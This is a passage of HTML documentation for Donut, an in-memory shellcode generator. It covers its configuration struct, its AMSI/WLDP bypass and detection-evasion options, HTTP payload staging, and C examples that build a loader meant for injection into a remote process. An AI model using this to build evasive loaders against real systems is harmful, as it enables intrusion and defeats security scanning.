<span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// command line to use for unmanaged DLL/EXE and .NET DLL/EXE</span>
<span style='color:#800000; font-weight:bold; '>int</span> unicode<span style='color:#800080; '>;</span> <span style='color:#696969; '>// param is passed to DLL function without converting to unicode</span>
<span style='color:#696969; '>// HTTP/DNS staging information</span>
<span style='color:#800000; font-weight:bold; '>char</span> server<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to root path of where module will be stored on remote HTTP server or DNS server</span>
<span style='color:#800000; font-weight:bold; '>char</span> modname<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of module written to disk for http stager</span>
<span style='color:#696969; '>// DONUT_MODULE</span>
<span style='color:#800000; font-weight:bold; '>int</span> mod_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// VBS/JS/DLL/EXE</span>
<span style='color:#800000; font-weight:bold; '>int</span> mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_MODULE</span>
DONUT_MODULE <span style='color:#808030; '>*</span>mod<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to DONUT_MODULE</span>
<span style='color:#696969; '>// DONUT_INSTANCE</span>
<span style='color:#800000; font-weight:bold; '>int</span> inst_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_EMBED or DONUT_INSTANCE_HTTP</span>
<span style='color:#800000; font-weight:bold; '>int</span> inst_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_INSTANCE</span>
DONUT_INSTANCE <span style='color:#808030; '>*</span>inst<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to DONUT_INSTANCE</span>
<span style='color:#696969; '>// shellcode generated from configuration</span>
<span style='color:#800000; font-weight:bold; '>int</span> pic_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of loader/shellcode</span>
<span style='color:#800000; font-weight:bold; '>void</span><span style='color:#808030; '>*</span> pic<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to loader/shellcode</span>
<span style='color:#800080; '>}</span> DONUT_CONFIG<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CONFIG<span style='color:#800080; '>;</span>
</pre>
<p>The following table provides a description of each member.</p>
<table border="1">
<tr>
<th>Member</th>
<th>Description</th>
</tr>
<tr>
<td><code>len, zlen</code></td>
<td><var>len</var> holds the length of the file to execute in-memory. If compression is used, <var>zlen</var> will hold the length of file compressed.</td>
</tr>
<tr>
<td><code>arch</code></td>
<td>Indicates the type of assembly code to generate. <code>DONUT_ARCH_X86</code> and <code>DONUT_ARCH_X64</code> are self-explanatory. <code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both X86 and AMD64. ARM64 will be supported at some point.</td>
</tr>
<tr>
<td><code>bypass</code></td>
<td>Specifies behaviour of the code responsible for bypassing AMSI and WLDP. The current options are <code>DONUT_BYPASS_NONE</code> which indicates that no attempt be made to disable AMSI or WLDP. <code>DONUT_BYPASS_ABORT</code> indicates that failure to disable should result in aborting execution of the module. <code>DONUT_BYPASS_CONTINUE</code> indicates that even if AMSI/WDLP bypasses fail, the shellcode will continue with execution.</td>
</tr>
<tr>
<td><code>compress</code></td>
<td>Indicates if the input file should be compressed. Available engines are <code>DONUT_COMPRESS_APLIB</code> to use the <a href="http://ibsensoftware.com/products_aPLib.html">aPLib</a> algorithm. For builds on Windows, the <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtlcompressbuffer">RtlCompressBuffer</a> API is available and supports <code>DONUT_COMPRESS_LZNT1</code>, <code>DONUT_COMPRESS_XPRESS</code> and <code>DONUT_COMPRESS_XPRESS_HUFF</code>.</td>
</tr>
<tr>
<td><code>entropy</code></td>
<td>Indicates whether Donut should use entropy and/or encryption for the loader to help evade detection. Available options are <code>DONUT_ENTROPY_NONE</code>, <code>DONUT_ENTROPY_RANDOM</code>, which generates random strings and <code>DONUT_ENTROPY_DEFAULT</code> that combines <code>DONUT_ENTROPY_RANDOM</code> with symmetric encryption.</td>
</tr>
<tr>
<td><code>format</code></td>
<td>Specifies the output format for the shellcode loader. Supported formats are <code>DONUT_FORMAT_BINARY</code>, <code>DONUT_FORMAT_BASE64</code>, <code>DONUT_FORMAT_RUBY</code>, <code>DONUT_FORMAT_C</code>, <code>DONUT_FORMAT_PYTHON</code>, <code>DONUT_FORMAT_POWERSHELL</code>, <code>DONUT_FORMAT_CSHARP</code> and <code>DONUT_FORMAT_HEX</code>. On Windows, the base64 string is copied to the clipboard.</td>
</tr>
<tr>
<td><code>exit_opt</code></td>
<td>When the shellcode ends, <code>RtlExitUserThread</code> is called, which is the default behaviour. Set this to <code>DONUT_OPT_EXIT_PROCESS</code> to terminate the host process via the <code>RtlExitUserProcess</code> API.Use 3=<code>DONUT_OPT_EXIT_BLOCK</code> to not exit or cleanup and instead block indefinitely.</td>
</tr>
<tr>
<td><code>thread</code></td>
<td>If the file is an unmanaged EXE, the loader will run the entrypoint as a thread. The loader also attempts to intercept calls to exit-related API stored in the Import Address Table by replacing those pointers with the address of the <code>RtlExitUserThread</code> API. However, hooking via IAT is generally unreliable and Donut may use code splicing / hooking in the future.</td>
</tr>
<tr>
<td><code>oep</code></td>
<td>Tells the loader to create a new thread before continuing execution at the OEP provided by the user. Address should be in hexadecimal format.</td>
</tr>
<tr>
<td><code>input</code></td>
<td>The path of file to execute in-memory. VBS/JS/EXE/DLL files are supported.</td>
</tr>
<tr>
<td><code>output</code></td>
<td>The path of where to save the shellcode/loader. Default is "loader.bin".</td>
</tr>
<tr>
<td><code>runtime</code></td>
<td>The CLR runtime version to use for a .NET assembly. If none is provided, Donut will try reading from the PE's COM directory. If that fails, v4.0.30319 is used by default.</td>
</tr>
<tr>
<td><code>domain</code></td>
<td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly. If entropy is disabled, it will be set to "AAAAAAAA"</td>
</tr>
<tr>
<td><code>cls</code></td>
<td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</var></td>
</tr>
<tr>
<td><code>method</code></td>
<td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td>
</tr>
<tr>
<td><code>param</code></td>
<td>String with a list of parameters for the .NET method or DLL function. For unmanaged EXE files, a 4-byte string is generated randomly to act as the module name. If entropy is disabled, this will be "AAAA"</td>
</tr>
<tr>
<td><code>unicode</code></td>
<td>By default, the <code>param</code> string is passed to an unmanaged DLL function as-is, in ANSI format. If set, param is converted to UNICODE.</td>
</tr>
<tr>
<td><code>server</code></td>
<td>If the instance <code>type</code> is <code>DONUT_INSTANCE_HTTP</code>, this should contain the server and path of where module will be stored. e.g: https://www.staging-server.com/modules/</td>
</tr>
<tr>
<td><code>modname</code></td>
<td>If the <code>type</code> is <code>DONUT_INSTANCE_HTTP</code>, this will contain the name of the module for where to save the contents of <code>mod</code> to disk. If none is provided by the user, it will be generated randomly. If entropy is disabled, it will be set to "AAAAAAAA"</td>
</tr>
<tr>
<td><code>mod_type</code></td>
<td>Indicates the type of file detected by <code>DonutCreate</code>. For example, <code>DONUT_MODULE_VBS</code> indicates a VBScript file.</td>
</tr>
<tr>
<td><code>mod_len</code></td>
<td>The total size of the <var>Module</var> pointed to by <code>mod</code>.</td>
</tr>
<tr>
<td><code>mod</code></td>
<td>Points to encrypted <var>Module</var>. If the <code>type</code> is <code>DONUT_INSTANCE_HTTP</code>, this should be saved to file using the <code>modname</code> and accessible via HTTP server.</td>
</tr>
<tr>
<td><code>inst_type</code></td>
<td><code>DONUT_INSTANCE_EMBED</code> indicates a self-contained payload which means the file is embedded. <code>DONUT_INSTANCE_HTTP</code> indicates the file is stored on a remote HTTP server.</td>
</tr>
<tr>
<td><code>inst_len</code></td>
<td>The total size of the <var>Instance</var> pointed to by <code>inst</code>.</td>
</tr>
<tr>
<td><code>inst</code></td>
<td>Points to an encrypted <var>Instance</var> after a successful call to <code>DonutCreate</code>. Since it's already attached to the <code>pic</code>, this is only provided for debugging purposes.</td>
</tr>
<tr>
<td><code>pic_len</code></td>
<td>The size of data pointed to by <code>pic</code>.</td>
</tr>
<tr>
<td><code>pic</code></td>
<td>Points to the loader/shellcode. This should be injected into a remote process.</td>
</tr>
</table>
<h2 id="static">4. Static Example</h2>
<p>The following is linked with the static library donut.lib on Windows or donut.a on Linux.</p>
<pre style='color:#000000;background:#ffffff;'><span style='color:#004a43; '>#</span><span style='color:#004a43; '>include </span><span style='color:#800000; '>"</span><span style='color:#40015a; '>donut.h</span><span style='color:#800000; '>"</span>
<span style='color:#800000; font-weight:bold; '>int</span> <span style='color:#400000; '>main</span><span style='color:#808030; '>(</span><span style='color:#800000; font-weight:bold; '>int</span> argc<span style='color:#808030; '>,</span> <span style='color:#800000; font-weight:bold; '>char</span> <span style='color:#808030; '>*</span>argv<span style='color:#808030; '>[</span><span style='color:#808030; '>]</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
DONUT_CONFIG c<span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>int</span> err<span style='color:#800080; '>;</span>
<span style='color:#603000; '>FILE</span> <span style='color:#808030; '>*</span>out<span style='color:#800080; '>;</span>
<span style='color:#696969; '>// need at least a file</span>
<span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>argc <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> <span style='color:#008c00; '>2</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
<span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ usage: donut_static &lt;EXE></span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
<span style='color:#800080; '>}</span>
<span style='color:#603000; '>memset</span><span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>,</span> <span style='color:#008c00; '>0</span><span style='color:#808030; '>,</span> <span style='color:#800000; font-weight:bold; '>sizeof</span><span style='color:#808030; '>(</span>c<span style='color:#808030; '>)</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#696969; '>// copy input file</span>
<span style='color:#400000; '>lstrcpyn</span><span style='color:#808030; '>(</span>c<span style='color:#808030; '>.</span>input<span style='color:#808030; '>,</span> argv<span style='color:#808030; '>[</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>]</span><span style='color:#808030; '>,</span> DONUT_MAX_NAME<span style='color:#808030; '>-</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#696969; '>// default settings</span>
c<span style='color:#808030; '>.</span>inst_type <span style='color:#808030; '>=</span> DONUT_INSTANCE_EMBED<span style='color:#800080; '>;</span> <span style='color:#696969; '>// file is embedded</span>
c<span style='color:#808030; '>.</span>arch <span style='color:#808030; '>=</span> DONUT_ARCH_X84<span style='color:#800080; '>;</span> <span style='color:#696969; '>// dual-mode (x86+amd64)</span>
c<span style='color:#808030; '>.</span>bypass <span style='color:#808030; '>=</span> DONUT_BYPASS_CONTINUE<span style='color:#800080; '>;</span> <span style='color:#696969; '>// continues loading even if disabling AMSI/WLDP fails</span>
c<span style='color:#808030; '>.</span>format <span style='color:#808030; '>=</span> DONUT_FORMAT_BINARY<span style='color:#800080; '>;</span> <span style='color:#696969; '>// default output format</span>
c<span style='color:#808030; '>.</span>compress <span style='color:#808030; '>=</span> DONUT_COMPRESS_NONE<span style='color:#800080; '>;</span> <span style='color:#696969; '>// compression is disabled by default</span>
c<span style='color:#808030; '>.</span>entropy <span style='color:#808030; '>=</span> DONUT_ENTROPY_DEFAULT<span style='color:#800080; '>;</span> <span style='color:#696969; '>// enable random names + symmetric encryption by default</span>
c<span style='color:#808030; '>.</span>exit_opt <span style='color:#808030; '>=</span> DONUT_OPT_EXIT_THREAD<span style='color:#800080; '>;</span> <span style='color:#696969; '>// default behaviour is to exit the thread</span>
c<span style='color:#808030; '>.</span>thread <span style='color:#808030; '>=</span> <span style='color:#008c00; '>1</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// run entrypoint as a thread</span>
c<span style='color:#808030; '>.</span>unicode <span style='color:#808030; '>=</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// command line will not be converted to unicode for unmanaged DLL function</span>
<span style='color:#696969; '>// generate the shellcode</span>
err <span style='color:#808030; '>=</span> DonutCreate<span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>err <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> DONUT_ERROR_SUCCESS<span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
<span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Error : </span><span style='color:#007997; '>%s</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> DonutError<span style='color:#808030; '>(</span>err<span style='color:#808030; '>)</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
<span style='color:#800080; '>}</span>
<span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ loader saved to </span><span style='color:#007997; '>%s</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> c<span style='color:#808030; '>.</span>output<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
DonutDelete<span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
<span style='color:#800080; '>}</span>
</pre>
<h2 id="dynamic">5. Dynamic Example</h2>
<p>This example requires access to donut.dll on Windows or donut.so on Linux.</p>
<pre style='color:#000000;background:#ffffff;'><span style='color:#004a43; '>#</span><span style='color:#004a43; '>include </span><span style='color:#800000; '>"</span><span style='color:#40015a; '>donut.h</span><span style='color:#800000; '>"</span>
<span style='color:#800000; font-weight:bold; '>int</span> <span style='color:#400000; '>main</span><span style='color:#808030; '>(</span><span style='color:#800000; font-weight:bold; '>int</span> argc<span style='color:#808030; '>,</span> <span style='color:#800000; font-weight:bold; '>char</span> <span style='color:#808030; '>*</span>argv<span style='color:#808030; '>[</span><span style='color:#808030; '>]</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
DONUT_CONFIG c<span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>int</span> err<span style='color:#800080; '>;</span>
<span style='color:#696969; '>// function pointers</span>
DonutCreate_t _DonutCreate<span style='color:#800080; '>;</span>
DonutDelete_t _DonutDelete<span style='color:#800080; '>;</span>
DonutError_t _DonutError<span style='color:#800080; '>;</span>
<span style='color:#696969; '>// need at least a file</span>
<span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>argc <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> <span style='color:#008c00; '>2</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
<span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ usage: donut_dynamic &lt;file></span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
<span style='color:#800080; '>}</span>
<span style='color:#696969; '>// try load donut.dll or donut.so</span>
<span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>if</span><span style='color:#004a43; '> </span><span style='color:#004a43; '>defined</span><span style='color:#808030; '>(</span><span style='color:#004a43; '>WINDOWS</span><span style='color:#808030; '>)</span>
<span style='color:#603000; '>HMODULE</span> m <span style='color:#808030; '>=</span> <span style='color:#400000; '>LoadLibrary</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '>donut.dll</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>m <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
_DonutCreate <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutCreate_t<span style='color:#808030; '>)</span><span style='color:#400000; '>GetProcAddress</span><span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutCreate</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
_DonutDelete <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutDelete_t<span style='color:#808030; '>)</span><span style='color:#400000; '>GetProcAddress</span><span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutDelete</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
_DonutError <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutError_t<span style='color:#808030; '>)</span> <span style='color:#400000; '>GetProcAddress</span><span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutError</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>_DonutCreate <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span> <span style='color:#808030; '>|</span><span style='color:#808030; '>|</span> _DonutDelete <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span> <span style='color:#808030; '>|</span><span style='color:#808030; '>|</span> _DonutError <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
<span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Unable to resolve Donut API.</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
<span style='color:#800080; '>}</span>
<span style='color:#800080; '>}</span> <span style='color:#800000; font-weight:bold; '>else</span> <span style='color:#800080; '>{</span>
<span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Unable to load donut.dll.</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
<span style='color:#800080; '>}</span>
<span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>else</span>
<span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>m <span style='color:#808030; '>=</span> dlopen<span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '>donut.so</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> RTLD_LAZY<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>m <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
_DonutCreate <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutCreate_t<span style='color:#808030; '>)</span>dlsym<span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutCreate</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
_DonutDelete <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutDelete_t<span style='color:#808030; '>)</span>dlsym<span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutDelete</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
_DonutError <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutError_t<span style='color:#808030; '>)</span> dlsym<span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutError</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>_DonutCreate <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span> <span style='color:#808030; '>|</span><span style='color:#808030; '>|</span> _DonutDelete <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span> <span style='color:#808030; '>|</span><span style='color:#808030; '>|</span> _DonutError <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
<span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Unable to resolve Donut API.</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
<span style='color:#800080; '>}</span>
<span style='color:#800080; '>}</span> <span style='color:#800000; font-weight:bold; '>else</span> <span style='color:#800080; '>{</span>
<span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Unable to load donut.so.</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
<span style='color:#800080; '>}</span>
<span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>endif</span>
<span style='color:#603000; '>memset</span><span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>,</span> <span style='color:#008c00; '>0</span><span style='color:#808030; '>,</span> <span style='color:#800000; font-weight:bold; '>sizeof</span><span style='color:#808030; '>(</span>c<span style='color:#808030; '>)</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#696969; '>// copy input file</span>
<span style='color:#400000; '>lstrcpyn</span><span style='color:#808030; '>(</span>c<span style='color:#808030; '>.</span>input<span style='color:#808030; '>,</span> argv<span style='color:#808030; '>[</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>]</span><span style='color:#808030; '>,</span> DONUT_MAX_NAME<span style='color:#808030; '>-</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#696969; '>// default settings</span>
c<span style='color:#808030; '>.</span>inst_type <span style='color:#808030; '>=</span> DONUT_INSTANCE_EMBED<span style='color:#800080; '>;</span> <span style='color:#696969; '>// file is embedded</span>
c<span style='color:#808030; '>.</span>arch <span style='color:#808030; '>=</span> DONUT_ARCH_X84<span style='color:#800080; '>;</span> <span style='color:#696969; '>// dual-mode (x86+amd64)</span>
c<span style='color:#808030; '>.</span>bypass <span style='color:#808030; '>=</span> DONUT_BYPASS_CONTINUE<span style='color:#800080; '>;</span> <span style='color:#696969; '>// continues loading even if disabling AMSI/WLDP fails</span>
c<span style='color:#808030; '>.</span>format <span style='color:#808030; '>=</span> DONUT_FORMAT_BINARY<span style='color:#800080; '>;</span> <span style='color:#696969; '>// default output format</span>
c<span style='color:#808030; '>.</span>compress <span style='color:#808030; '>=</span> DONUT_COMPRESS_NONE<span style='color:#800080; '>;</span> <span style='color:#696969; '>// compression is disabled by default</span>
c<span style='color:#808030; '>.</span>entropy <span style='color:#808030; '>=</span> DONUT_ENTROPY_DEFAULT<span style='color:#800080; '>;</span> <span style='color:#696969; '>// enable random names + symmetric encryption by default</span>
c<span style='color:#808030; '>.</span>exit_opt <span style='color:#808030; '>=</span> DONUT_OPT_EXIT_THREAD<span style='color:#800080; '>;</span> <span style='color:#696969; '>// default behaviour is to exit the thread</span>
c<span style='color:#808030; '>.</span>thread <span style='color:#808030; '>=</span> <span style='color:#008c00; '>1</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// run entrypoint as a thread</span>
c<span style='color:#808030; '>.</span>unicode <span style='color:#808030; '>=</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// command line will not be converted to unicode for unmanaged DLL function</span>
<span style='color:#696969; '>// generate the shellcode</span>
err <span style='color:#808030; '>=</span> _DonutCreate<span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>err <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> DONUT_ERROR_SUCCESS<span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
<span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Error : </span><span style='color:#007997; '>%s</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> _DonutError<span style='color:#808030; '>(</span>err<span style='color:#808030; '>)</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
<span style='color:#800080; '>}</span>
<span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ loader saved to </span><span style='color:#007997; '>%s</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> c<span style='color:#808030; '>.</span>output<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
_DonutDelete<span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
<span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
<span style='color:#800080; '>}</span>
</pre>
<h2>Internals</h2>
<p>Everything that follows concerns internal workings of Donut and is not required knowledge to generate the shellcode/loader.</p>
<h2 id="com">6. Donut Components</h2>
<p>The following table lists the name of each file and what it's used for.</p>
<table border="1">
<tr>
<th>File</th>
<th>Description</th>
</tr>
<tr>
<td>donut.c</td>
<td>Main file for the shellcode generator.</td>
</tr>
<tr>
<td>include/donut.h</td>
<td>C header file used by the generator.</td>
</tr>
<tr>
<td>lib/donut.dll and lib/donut.lib</td>
<td>Dynamic and static libraries for Microsoft Windows.</td>
</tr>
<tr>
<td>lib/donut.so and lib/donut.a</td>
<td>Dynamic and static libraries for Linux.</td>
</tr>
<tr>
<td>lib/donut.h</td>
<td>C header file to be used in C/C++ based projects.</td>
</tr>
<tr>
<td>donutmodule.c</td>
<td>The CPython wrapper for Donut. Used by the Python module.</td>
</tr>
<tr>
<td>setup.py</td>
<td>The setup file for installing Donut as a Pip Python3 module.</td>
</tr>
<tr>
<td>hash.c</td>
<td>Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.</td>
</tr>
<tr>
<td>encrypt.c</td>
<td>Chaskey block cipher for encrypting modules.</td>
</tr>
<tr>
<td>loader/loader.c</td>
<td>Main file for the shellcode.</td>
</tr>
<tr>
<td>loader/inmem_dotnet.c</td>
<td>In-Memory loader for .NET EXE/DLL assemblies.</td>
</tr>
<tr>
<td>loader/inmem_pe.c</td>
<td>In-Memory loader for EXE/DLL files.</td>
</tr>
<tr>
<td>loader/inmem_script.c</td>
<td>In-Memory loader for VBScript/JScript files.</td>
</tr>
<tr>
<td>loader/activescript.c</td>
<td>ActiveScriptSite interface required for in-memory execution of VBS/JS files.</td>
</tr>
<tr>
<td>loader/wscript.c</td>
<td>Supports a number of WScript methods that cscript/wscript support.</td>
</tr>
<tr>
<td>loader/depack.c</td>
<td>Supports unpacking of modules compressed with aPLib.</td>
</tr>
<tr>
<td>loader/bypass.c</td>
